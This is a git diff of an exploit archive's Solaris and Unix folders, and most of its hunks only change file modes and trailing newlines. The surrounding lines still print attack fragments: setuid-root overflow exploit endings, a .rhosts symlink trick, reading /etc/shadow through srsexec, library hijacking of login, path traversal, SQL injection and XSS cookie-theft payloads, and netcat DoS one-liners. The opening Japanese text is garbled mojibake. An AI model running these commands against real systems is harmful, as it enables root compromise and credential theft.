$B%H(B2116-2119$B$N(BRET$B$,M-8z$H$J$k$h$&$G!"(Bintel$BHGF1MM$K%m!<%+%k%f!<%6!<$,(Broot$B8"(B $B8B$rC%<h$G$-$k$3$H$,3NG'$5$l$^$7$?!#$J$*!"%3!<%I@)8B$O(BIntel$BHG$h$j2?8N$+4E(B $B$/$J$C$F$$$k$h$&$G$9!&!&!&(B +*/ + +//---- ex_kcms_configuresp.c ----- ex_kcms_configuresp.c /*============================================================================= kcms_configure Exploit for Solaris2.6/7 Sparc Edition The Shadow Penguin Security (http://shadowpenguin.backsection.net) diff --git a/platforms/solaris/local/19343.c b/platforms/solaris/local/19343.c old mode 100755 new mode 100644 index 0fa4b4fbd..401f3454e --- a/platforms/solaris/local/19343.c +++ b/platforms/solaris/local/19343.c @@ -27,4 +27,4 @@ please_break_me.ifr_flags=0; if(ioctl(0, SIOCSIFFLAGS, &please_break_me)==-1) perror("Damn it didnt work. Obviously not Solaris ;)"); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/solaris/local/19350.sh b/platforms/solaris/local/19350.sh index 05a9563d1..091bd4dda 100755 --- a/platforms/solaris/local/19350.sh +++ b/platforms/solaris/local/19350.sh @@ -31,4 +31,4 @@ rm /tmp/locksuntechd ln -s ~targetuser/.rhosts /tmp/locksuntechd exit ------ -then wait a min and cat + + >> ~targetuser/.rhosts \ No newline at end of file +then wait a min and cat + + >> ~targetuser/.rhosts \ No newline at end of file diff --git a/platforms/solaris/local/19529.c b/platforms/solaris/local/19529.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/19533.c b/platforms/solaris/local/19533.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/19534.c b/platforms/solaris/local/19534.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/19647.c b/platforms/solaris/local/19647.c old mode 100755 new mode 100644 index a28a8ddd5..00e5992de --- a/platforms/solaris/local/19647.c +++ b/platforms/solaris/local/19647.c @@ -1,6 +1,8 @@ +/* source: http://www.securityfocus.com/bid/831/info The binary kcms_configure, part of the Kodak Color Management System package shipped with OpenWindows (and ultimately, Solaris) is vulnerable to a local buffer overflow. The buffer which the contents of the environment variable NETPATH are copied into has a predetermined length, which if exceeded can corrupt the stack and cause aribtrary code hidden inside of the oversized buffer to be executed. kcms_configure is installed setuid root and exploitation will result in a local root compromise. +*/ ------ ex_kcms_configure86.c /*============================================================================= @@ -64,4 +66,4 @@ buf[MAXBUF-1]=0; putenv(buf); execl("/usr/openwin/bin/kcms_configure","kcms_configure","1",0); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/solaris/local/19648.c b/platforms/solaris/local/19648.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/197.c b/platforms/solaris/local/197.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/19757.txt b/platforms/solaris/local/19757.txt old mode 100755 new mode 100644 index d9eb61f5f..c782de23a --- a/platforms/solaris/local/19757.txt +++ b/platforms/solaris/local/19757.txt @@ -4,4 +4,4 @@ A vulnerability exists in the installation of licenses for Sun's WorkShop 5.0 co Lit is not part of Globetrotter's FlexLM distribution. It is a license installation tool supplied by Sun for convenience purposes. This vulnerability does not represent a vulnerability in lmgrd, but a flaw in the license installation process. Running lmgrd as a user other than root, while a good idea, will not eliminate this problem. -ln -sf /.rhost /var/tmp/license_errors \ No newline at end of file +ln -sf /.rhost /var/tmp/license_errors \ No newline at end of file diff --git a/platforms/solaris/local/19872.c b/platforms/solaris/local/19872.c old mode 100755 new mode 100644 index b0ea465e8..16b91aad5 --- a/platforms/solaris/local/19872.c +++ b/platforms/solaris/local/19872.c @@ -65,4 +65,4 @@ if (argc > 3) nop = strtol(argv[2], NULL, 0); printf("addr = 0x%x\n", addr); execl("/usr/bin/lpset", "lpset", "-n", "fns", "-r", buffer,"digit", NULL); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/solaris/local/19873.c b/platforms/solaris/local/19873.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/19874.c b/platforms/solaris/local/19874.c old mode 100755 new mode 100644 index ad2177a58..d28f2cb92 --- a/platforms/solaris/local/19874.c +++ b/platforms/solaris/local/19874.c @@ -1,6 +1,8 @@ +/* source: http://www.securityfocus.com/bid/1138/info A vulnerability exists in the handling of the -r option to the lpset program, as included in Solaris 7 from Sun Microsystems. The -r option is undocumented. As such, its use in unknown. However, when supplied a well crafted buffer containing executable code, it is possible to execute arbitrary commands as root. +*/ #define BASE 0xdff40000 #define STACK 0x8047e30 diff --git a/platforms/solaris/local/19876.c b/platforms/solaris/local/19876.c old mode 100755 new mode 100644 index 80bd1d75e..799067a36 --- a/platforms/solaris/local/19876.c +++ b/platforms/solaris/local/19876.c @@ -50,4 +50,4 @@ int main(int argc, char *argv[]) { execl("/usr/openwin/bin/Xsun", "Xsun", "-dev", buff, NULL); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/solaris/local/19878.c b/platforms/solaris/local/19878.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/19910.c b/platforms/solaris/local/19910.c old mode 100755 new mode 100644 index d5e359867..183231a49 --- a/platforms/solaris/local/19910.c +++ b/platforms/solaris/local/19910.c @@ -146,4 +146,4 @@ main(int argc, char *argv[]) "/etc/passwd", NULL, NULL); fprintf(stderr, "unable to exec netpr: %s\n", strerror(errno)); exit(1); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/solaris/local/19911.c b/platforms/solaris/local/19911.c old mode 100755 new mode 100644 index 64d650df9..9a147a70a --- a/platforms/solaris/local/19911.c +++ b/platforms/solaris/local/19911.c @@ -192,4 +192,4 @@ main(int argc, char *argv[]) printf("exploit successful; /tmp/ksh is now SUID root, dewd!\n"); exit(0); } -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/solaris/local/20003.txt b/platforms/solaris/local/20003.txt old mode 100755 new mode 100644 index 5115a4434..5ad0a29db --- a/platforms/solaris/local/20003.txt +++ b/platforms/solaris/local/20003.txt @@ -4,4 +4,4 @@ The Shiva Access Manager is a solution for centralized remote access authenticat cat $SHIVA_HOME_DIR/insnmgmt/shiva_access_manager/radtac.ini -(proceed then to do whatever LDAP attacks you like) \ No newline at end of file +(proceed then to do whatever LDAP attacks you like) \ No newline at end of file diff --git a/platforms/solaris/local/20014.c b/platforms/solaris/local/20014.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/20018.txt b/platforms/solaris/local/20018.txt old mode 100755 new mode 100644 index b4e7af61c..bccd72de1 --- a/platforms/solaris/local/20018.txt +++ b/platforms/solaris/local/20018.txt @@ -41,4 +41,4 @@ drwxr-xr-x 26 root sys 512 Jun 8 09:51 .. foo@bar> /var/tmp/ksh # id uid=500(foo) gid=25(programmers) euid=0(root) -# \ No newline at end of file +# \ No newline at end of file diff --git a/platforms/solaris/local/20186.c b/platforms/solaris/local/20186.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/20188.c b/platforms/solaris/local/20188.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/20418.txt b/platforms/solaris/local/20418.txt old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/20603.c b/platforms/solaris/local/20603.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/2067.c b/platforms/solaris/local/2067.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/20684.c b/platforms/solaris/local/20684.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/20715.txt b/platforms/solaris/local/20715.txt old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/20740.c b/platforms/solaris/local/20740.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/20741.c b/platforms/solaris/local/20741.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/20743.c b/platforms/solaris/local/20743.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/20751.txt b/platforms/solaris/local/20751.txt old mode 100755 new mode 100644 index c08181124..4648199e3 --- a/platforms/solaris/local/20751.txt +++ b/platforms/solaris/local/20751.txt @@ -16,4 +16,4 @@ $ /usr/bin/ipcs Solaris x86: $ TZ=`perl -e 'print "A"x1035'` -$ /usr/bin/i86/ipcs \ No newline at end of file +$ /usr/bin/i86/ipcs \ No newline at end of file diff --git a/platforms/solaris/local/20767.c b/platforms/solaris/local/20767.c old mode 100755 new mode 100644 index 41322a8a7..1822c4565 --- a/platforms/solaris/local/20767.c +++ b/platforms/solaris/local/20767.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/2605/info The Kodak Color Management System configuration tool 'kcms_configure' is vulnerable to a buffer overflow that could yield root privileges to an attacker. @@ -5,6 +6,7 @@ The Kodak Color Management System configuration tool 'kcms_configure' is vulnera The bug exists in the KCMS_PROFILES environment variable parser in a shared library 'kcsSUNWIOsolf.so' used by kcms_configure. If an overly long KCMS_PROFILES variable is set and kcms_configure is subsequently run, kcms_configure will overflow. Because the kcms_configure binary is setuid root, the overflow allows an attacker to execute arbitrary code as root. Exploits are available against Solaris x86 and Solaris Sparc. +*/ /*## copyright LAST STAGE OF DELIRIUM dec 1999 poland *://lsd-pl.net/ #*/ /*## kcsSUNWIOsolf.so #*/ diff --git a/platforms/solaris/local/20768.c b/platforms/solaris/local/20768.c old mode 100755 new mode 100644 index 3fc1cfe0a..6fda4e1eb --- a/platforms/solaris/local/20768.c +++ b/platforms/solaris/local/20768.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/2605/info The Kodak Color Management System configuration tool 'kcms_configure' is vulnerable to a buffer overflow that could yield root privileges to an attacker. @@ -5,6 +6,7 @@ The Kodak Color Management System configuration tool 'kcms_configure' is vulnera The bug exists in the KCMS_PROFILES environment variable parser in a shared library 'kcsSUNWIOsolf.so' used by kcms_configure. If an overly long KCMS_PROFILES variable is set and kcms_configure is subsequently run, kcms_configure will overflow. Because the kcms_configure binary is setuid root, the overflow allows an attacker to execute arbitrary code as root. Exploits are available against Solaris x86 and Solaris Sparc. +*/ /*## copyright LAST STAGE OF DELIRIUM dec 1999 poland *://lsd-pl.net/ #*/ /*## kcsSUNWIOsolf.so #*/ diff --git a/platforms/solaris/local/20772.c b/platforms/solaris/local/20772.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/20773.c b/platforms/solaris/local/20773.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/20885.c b/platforms/solaris/local/20885.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/20945.txt b/platforms/solaris/local/20945.txt old mode 100755 new mode 100644 index 51823f3be..12018e54e --- a/platforms/solaris/local/20945.txt +++ b/platforms/solaris/local/20945.txt @@ -29,4 +29,4 @@ Incurred fault #6, FLTBOUNDS %pc = 0xFF139FF0 siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141 Received signal #11, SIGSEGV [default] siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141 -*** process killed *** \ No newline at end of file +*** process killed *** \ No newline at end of file diff --git a/platforms/solaris/local/20969.c b/platforms/solaris/local/20969.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/20970.c b/platforms/solaris/local/20970.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/20974.c b/platforms/solaris/local/20974.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/210.c b/platforms/solaris/local/210.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/21024.c b/platforms/solaris/local/21024.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/21058.c b/platforms/solaris/local/21058.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/21059.c b/platforms/solaris/local/21059.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/21360.c b/platforms/solaris/local/21360.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/22120.c b/platforms/solaris/local/22120.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/22203.txt b/platforms/solaris/local/22203.txt old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/2241.c b/platforms/solaris/local/2241.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/2330.c b/platforms/solaris/local/2330.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/2331.c b/platforms/solaris/local/2331.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/2360.c b/platforms/solaris/local/2360.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/23874.txt b/platforms/solaris/local/23874.txt old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/247.c b/platforms/solaris/local/247.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/250.c b/platforms/solaris/local/250.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/256.c b/platforms/solaris/local/256.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/25703.txt b/platforms/solaris/local/25703.txt old mode 100755 new mode 100644 index 1b34aa1a0..ce089bcee --- a/platforms/solaris/local/25703.txt +++ b/platforms/solaris/local/25703.txt @@ -7,4 +7,4 @@ Successful exploitation could result in a compromise of the application, disclos All versions are considered to be vulnerable at the moment. Uername =admin -Password= ' or ''=' \ No newline at end of file +Password= ' or ''=' \ No newline at end of file diff --git a/platforms/solaris/local/28425.txt b/platforms/solaris/local/28425.txt old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/30021.txt b/platforms/solaris/local/30021.txt old mode 100755 new mode 100644 index 10f3ff972..0e981cd0d --- a/platforms/solaris/local/30021.txt +++ b/platforms/solaris/local/30021.txt @@ -5,4 +5,4 @@ Sun Microsystems Solaris is prone to a local information-disclosure vulnerabilit A local attacker may exploit this issue to access sensitive information, including superuser password information, that may lead to further attacks. A complete compromise is possible. The following exploit example is available: -$ /opt/SUNWsrspx/bin/srsexec -dvb /etc/shadow OWNED \ No newline at end of file +$ /opt/SUNWsrspx/bin/srsexec -dvb /etc/shadow OWNED \ No newline at end of file diff --git a/platforms/solaris/local/328.c b/platforms/solaris/local/328.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/338.c b/platforms/solaris/local/338.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/341.c b/platforms/solaris/local/341.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/34313.txt b/platforms/solaris/local/34313.txt old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/4.c b/platforms/solaris/local/4.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/4515.c b/platforms/solaris/local/4515.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/4516.c b/platforms/solaris/local/4516.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/5227.c b/platforms/solaris/local/5227.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/713.c b/platforms/solaris/local/713.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/714.c b/platforms/solaris/local/714.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/715.c b/platforms/solaris/local/715.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/local/972.c b/platforms/solaris/local/972.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/remote/1167.pm b/platforms/solaris/remote/1167.pm old mode 100755 new mode 100644 diff --git a/platforms/solaris/remote/19040.txt b/platforms/solaris/remote/19040.txt old mode 100755 new mode 100644 diff --git a/platforms/solaris/remote/19044.txt b/platforms/solaris/remote/19044.txt old mode 100755 new mode 100644 index cdc84162e..e69ce9514 --- a/platforms/solaris/remote/19044.txt +++ b/platforms/solaris/remote/19044.txt @@ -16,4 +16,4 @@ $ mkdir /tmp/mylib $ cp libevil.so /tmp/mylib $ export LD_LIBRARY_PATH=/tmp/mylib $ /bin/login -# \ No newline at end of file +# \ No newline at end of file diff --git a/platforms/solaris/remote/19236.txt b/platforms/solaris/remote/19236.txt old mode 100755 new mode 100644 index 7b20d2f02..590410e15 --- a/platforms/solaris/remote/19236.txt +++ b/platforms/solaris/remote/19236.txt @@ -39,4 +39,4 @@ $)C SOMETHING -*NOTE* Here we link a random /etc/ file to core. In this instance we simply use SOMETHING as our random filename. You could just as easily use /etc/passwd. \ No newline at end of file +*NOTE* Here we link a random /etc/ file to core. In this instance we simply use SOMETHING as our random filename. You could just as easily use /etc/passwd. \ No newline at end of file diff --git a/platforms/solaris/remote/19327.c b/platforms/solaris/remote/19327.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/remote/19663.c b/platforms/solaris/remote/19663.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/remote/19668.c b/platforms/solaris/remote/19668.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/remote/19669.c b/platforms/solaris/remote/19669.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/remote/19670.c b/platforms/solaris/remote/19670.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/remote/19672.c b/platforms/solaris/remote/19672.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/remote/19696.c b/platforms/solaris/remote/19696.c old mode 100755 new mode 100644 index 36b161652..69d383eda --- a/platforms/solaris/remote/19696.c +++ b/platforms/solaris/remote/19696.c @@ -107,5 +107,4 @@ int aux; free(buf); -} - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/solaris/remote/20144.txt b/platforms/solaris/remote/20144.txt old mode 100755 new mode 100644 index 6c63849fa..44f55c66c --- a/platforms/solaris/remote/20144.txt +++ b/platforms/solaris/remote/20144.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/1554/info A lack of authentication checks for certain scripts within the administration interface of AnswerBook2 versions 1.4.2 and prior, for Solaris, allows remote users to create administration accounts. By directly accessing the /cgi-bin/admin/admin script present under the AnswerBook2 dwhttpd web server, it is possible to add users to the administration interface. This will allow the attacker to read log files and manage content. -http://www.example.com:8888/cgi-bin/admin/admin?command=add_user&uid=percebe&password=percebe&re_password=percebe" \ No newline at end of file +http://www.example.com:8888/cgi-bin/admin/admin?command=add_user&uid=percebe&password=percebe&re_password=percebe" \ No newline at end of file diff --git a/platforms/solaris/remote/20146.txt b/platforms/solaris/remote/20146.txt old mode 100755 new mode 100644 diff --git a/platforms/solaris/remote/20602.c b/platforms/solaris/remote/20602.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/remote/20648.c b/platforms/solaris/remote/20648.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/remote/20649.pm b/platforms/solaris/remote/20649.pm old mode 100755 new mode 100644 diff --git a/platforms/solaris/remote/20745.txt b/platforms/solaris/remote/20745.txt old mode 100755 new mode 100644 index f612e8f2e..8f7b92f6b --- a/platforms/solaris/remote/20745.txt +++ b/platforms/solaris/remote/20745.txt @@ -12,4 +12,4 @@ cwd ~netadm 530 Please login with USER and PASS. cwd ~xyz 530 Please login with USER and PASS. -550 Unknown user name after ~ \ No newline at end of file +550 Unknown user name after ~ \ No newline at end of file diff --git a/platforms/solaris/remote/20764.txt b/platforms/solaris/remote/20764.txt old mode 100755 new mode 100644 index 5a742a138..aca3413ce --- a/platforms/solaris/remote/20764.txt +++ b/platforms/solaris/remote/20764.txt @@ -25,4 +25,4 @@ Connection closed by foreign host. lp:NP:6445:::::: P:64 eH:::: -uucp:NP:6445::: \ No newline at end of file +uucp:NP:6445::: \ No newline at end of file diff --git a/platforms/solaris/remote/20966.c b/platforms/solaris/remote/20966.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/remote/21097.txt b/platforms/solaris/remote/21097.txt old mode 100755 new mode 100644 diff --git a/platforms/solaris/remote/213.c b/platforms/solaris/remote/213.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/remote/21437.c b/platforms/solaris/remote/21437.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/remote/21677.txt b/platforms/solaris/remote/21677.txt old mode 100755 new mode 100644 diff --git a/platforms/solaris/remote/21678.c b/platforms/solaris/remote/21678.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/remote/23272.txt b/platforms/solaris/remote/23272.txt old mode 100755 new mode 100644 index fbb559d9f..698fb007c --- a/platforms/solaris/remote/23272.txt +++ b/platforms/solaris/remote/23272.txt @@ -7,4 +7,4 @@ http://www.example.com:898/../../../../../.rhosts http://www.example.com:898/../../../../../.ssh http://www.example.com:898/../../../../../var/yp -These examples were return different error messages based on whether the requested resource exists or not. \ No newline at end of file +These examples were return different error messages based on whether the requested resource exists or not. \ No newline at end of file diff --git a/platforms/solaris/remote/23605.txt b/platforms/solaris/remote/23605.txt old mode 100755 new mode 100644 index d8bd93f6b..09958021f --- a/platforms/solaris/remote/23605.txt +++ b/platforms/solaris/remote/23605.txt @@ -4,4 +4,4 @@ Cherokee has been reported to contain a cross-site scripting vulnerability via e An attacker can exploit this issue by crafting a URI link containing the malevolent HTML or script code, and enticing a user to follow it. The attacker-supplied code may be rendered in the web browser of a user who follows the malicious link. Exploitation of this issue may allow for theft of cookie-based authentication credentials or other attacks. -http://www.example.com/<script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/solaris/remote/239.c b/platforms/solaris/remote/239.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/remote/280.c b/platforms/solaris/remote/280.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/remote/301.c b/platforms/solaris/remote/301.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/remote/32393.txt b/platforms/solaris/remote/32393.txt old mode 100755 new mode 100644 diff --git a/platforms/solaris/remote/5282.txt b/platforms/solaris/remote/5282.txt old mode 100755 new mode 100644 diff --git a/platforms/solaris/remote/57.txt b/platforms/solaris/remote/57.txt old mode 100755 new mode 100644 diff --git a/platforms/solaris/remote/6328.c b/platforms/solaris/remote/6328.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/remote/716.c b/platforms/solaris/remote/716.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/shellcode/13733.c b/platforms/solaris/shellcode/13733.c old mode 100755 new mode 100644 diff --git a/platforms/solaris/webapps/10386.txt b/platforms/solaris/webapps/10386.txt old mode 100755 new mode 100644 diff --git a/platforms/solaris_sparc/shellcode/13489.c b/platforms/solaris_sparc/shellcode/13489.c old mode 100755 new mode 100644 diff --git a/platforms/solaris_sparc/shellcode/13490.c b/platforms/solaris_sparc/shellcode/13490.c old mode 100755 new mode 100644 diff --git a/platforms/solaris_sparc/shellcode/13492.c b/platforms/solaris_sparc/shellcode/13492.c old mode 100755 new mode 100644 diff --git a/platforms/solaris_sparc/shellcode/13493.c b/platforms/solaris_sparc/shellcode/13493.c old mode 100755 new mode 100644 diff --git a/platforms/solaris_sparc/shellcode/13494.txt b/platforms/solaris_sparc/shellcode/13494.txt old mode 100755 new mode 100644 diff --git a/platforms/solaris_sparc/shellcode/13495.c b/platforms/solaris_sparc/shellcode/13495.c old mode 100755 new mode 100644 diff --git a/platforms/solaris_sparc/shellcode/13496.c b/platforms/solaris_sparc/shellcode/13496.c old mode 100755 new mode 100644 diff --git a/platforms/solaris_sparc/shellcode/13497.txt b/platforms/solaris_sparc/shellcode/13497.txt old mode 100755 new mode 100644 diff --git a/platforms/solaris_x86/local/42270.c b/platforms/solaris_x86/local/42270.c old mode 100755 new mode 100644 diff --git a/platforms/solaris_x86/shellcode/13499.c b/platforms/solaris_x86/shellcode/13499.c old mode 100755 new mode 100644 diff --git a/platforms/solaris_x86/shellcode/13500.c b/platforms/solaris_x86/shellcode/13500.c old mode 100755 new mode 100644 diff --git a/platforms/solaris_x86/shellcode/13501.txt b/platforms/solaris_x86/shellcode/13501.txt old mode 100755 new mode 100644 diff --git a/platforms/solaris_x86/shellcode/13502.txt b/platforms/solaris_x86/shellcode/13502.txt old mode 100755 new mode 100644 diff --git a/platforms/solaris_x86/shellcode/13704.c b/platforms/solaris_x86/shellcode/13704.c old mode 100755 new mode 100644 diff --git a/platforms/solaris_x86/shellcode/13707.c b/platforms/solaris_x86/shellcode/13707.c old mode 100755 new mode 100644 diff --git a/platforms/solaris_x86/shellcode/13709.c b/platforms/solaris_x86/shellcode/13709.c old mode 100755 new mode 100644 diff --git a/platforms/solaris_x86/shellcode/13711.c b/platforms/solaris_x86/shellcode/13711.c old mode 100755 new mode 100644 diff --git a/platforms/solaris_x86/shellcode/13875.c b/platforms/solaris_x86/shellcode/13875.c old mode 100755 new mode 100644 diff --git a/platforms/system_z/shellcode/38075.txt b/platforms/system_z/shellcode/38075.txt old mode 100755 new mode 100644 diff --git a/platforms/tru64/local/259.c b/platforms/tru64/local/259.c old mode 100755 new mode 100644 diff --git a/platforms/tru64/local/281.c b/platforms/tru64/local/281.c old mode 100755 new mode 100644 diff --git a/platforms/tru64/local/3273.ksh b/platforms/tru64/local/3273.ksh old mode 100755 new mode 100644 diff --git a/platforms/ultrix/dos/19817.txt b/platforms/ultrix/dos/19817.txt old mode 100755 new mode 100644 index 1c1666b44..31b4cfb72 --- a/platforms/ultrix/dos/19817.txt +++ b/platforms/ultrix/dos/19817.txt @@ -4,4 +4,4 @@ A Denial of service (DoS) attack is possible with the default version of inetd d nmap -O -p 21 <target> or -nmap -v -O -sS -p1-1023 <target> \ No newline at end of file +nmap -v -O -sS -p1-1023 <target> \ No newline at end of file diff --git a/platforms/ultrix/local/698.c b/platforms/ultrix/local/698.c old mode 100755 new mode 100644 diff --git a/platforms/unix/dos/19615.c b/platforms/unix/dos/19615.c old mode 100755 new mode 100644 diff --git a/platforms/unix/dos/20192.txt b/platforms/unix/dos/20192.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/dos/20376.txt b/platforms/unix/dos/20376.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/dos/21236.txt b/platforms/unix/dos/21236.txt old mode 100755 new mode 100644 index 8fde2e6c1..7ac2c55da --- a/platforms/unix/dos/21236.txt +++ b/platforms/unix/dos/21236.txt @@ -6,4 +6,4 @@ There is a lack of sufficient bounds checking in DNS request and reply functions It is not known whether it is possible to execute arbitrary attacker-supplied instructions as a result of this vulnerability. -dd if=/dev/urandom bs=64 count=1 | nc -u 127.0.0.1 53 -w 1 \ No newline at end of file +dd if=/dev/urandom bs=64 count=1 | nc -u 127.0.0.1 53 -w 1 \ No newline at end of file diff --git a/platforms/unix/dos/21261.txt b/platforms/unix/dos/21261.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/dos/21345.txt b/platforms/unix/dos/21345.txt old mode 100755 new mode 100644 index e85b22a33..0fc8c56d4 --- a/platforms/unix/dos/21345.txt +++ b/platforms/unix/dos/21345.txt @@ -4,4 +4,4 @@ Qualcomm's QPopper is a POP3 mail server for Linux and Unix based systems. Recen A vulnerability has been reported in some versions of qpopper. Reportedly, if a string of longer than approximately 2048 characters is sent to the qpopper process, a denial of service condition will occur. -perl -e '{print "A"x"2049"}' | netcat host.com 110 \ No newline at end of file +perl -e '{print "A"x"2049"}' | netcat host.com 110 \ No newline at end of file diff --git a/platforms/unix/dos/21531.txt b/platforms/unix/dos/21531.txt old mode 100755 new mode 100644 index 2c50f5c54..57f106ff2 --- a/platforms/unix/dos/21531.txt +++ b/platforms/unix/dos/21531.txt @@ -4,4 +4,4 @@ OpenServer is commercial Unix operating system originally developed by SCO, and It may be possible for a local user to gain elevated privileges. When Xsco is executed, and an excessively long argument is supplied to the -co flag, a heap overflow occurs. This problem could allow a local user to supply a maliciously formatted string with the -co option that could result in the execution of arbitrary code, and elevated privileges. -./Xsco :1 -co `perl -e 'print "A" x 9000'` \ No newline at end of file +./Xsco :1 -co `perl -e 'print "A" x 9000'` \ No newline at end of file diff --git a/platforms/unix/dos/21632.c b/platforms/unix/dos/21632.c old mode 100755 new mode 100644 diff --git a/platforms/unix/dos/21644.txt b/platforms/unix/dos/21644.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/dos/21949.txt b/platforms/unix/dos/21949.txt old mode 100755 new mode 100644 index ba8207da7..9e179a18e --- a/platforms/unix/dos/21949.txt +++ b/platforms/unix/dos/21949.txt @@ -4,4 +4,4 @@ A vulnerability has been reported in the Caching Proxy component bundled with IB An attacker can exploit this vulnerability by sending a malformed HTTP request to the Caching Proxy. When the service attempts to process the request the service will crash thereby causing the denial of service. -GET /cgi-bin/helpout.exe HTTP \ No newline at end of file +GET /cgi-bin/helpout.exe HTTP \ No newline at end of file diff --git a/platforms/unix/dos/21984.c b/platforms/unix/dos/21984.c old mode 100755 new mode 100644 diff --git a/platforms/unix/dos/22031.txt b/platforms/unix/dos/22031.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/dos/22286.html b/platforms/unix/dos/22286.html old mode 100755 new mode 100644 diff --git a/platforms/unix/dos/22287.html b/platforms/unix/dos/22287.html old mode 100755 new mode 100644 index c24868a9e..9d00121f0 --- a/platforms/unix/dos/22287.html +++ b/platforms/unix/dos/22287.html @@ -26,4 +26,4 @@ MM/DD/YYYY - <input type=text name=dt> <input type=submit> </form> </body> -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/unix/dos/22918.txt b/platforms/unix/dos/22918.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/dos/22920.txt b/platforms/unix/dos/22920.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/dos/23945.txt b/platforms/unix/dos/23945.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/dos/24243.txt b/platforms/unix/dos/24243.txt old mode 100755 new mode 100644 index 25f9b426f..c264c318d --- a/platforms/unix/dos/24243.txt +++ b/platforms/unix/dos/24243.txt @@ -16,4 +16,4 @@ ygAAABIBAwABAAAAAQAAABoBBQABAAAA2AAAABsBBQABAAAA4AAAACgBAwABAAAAAgAAADEB AgAJAAAA6AAAADIBAgAUAAAACAEAABMCAwABAAAAAgAAAGmHBAABAAAAHAEAAAADAABPTFlN [Add here some megabytes of data. 1kB is not enough, but 12MB was sufficient in all my tests] ---- snip here; do not pste this line --- \ No newline at end of file +--- snip here; do not pste this line --- \ No newline at end of file diff --git 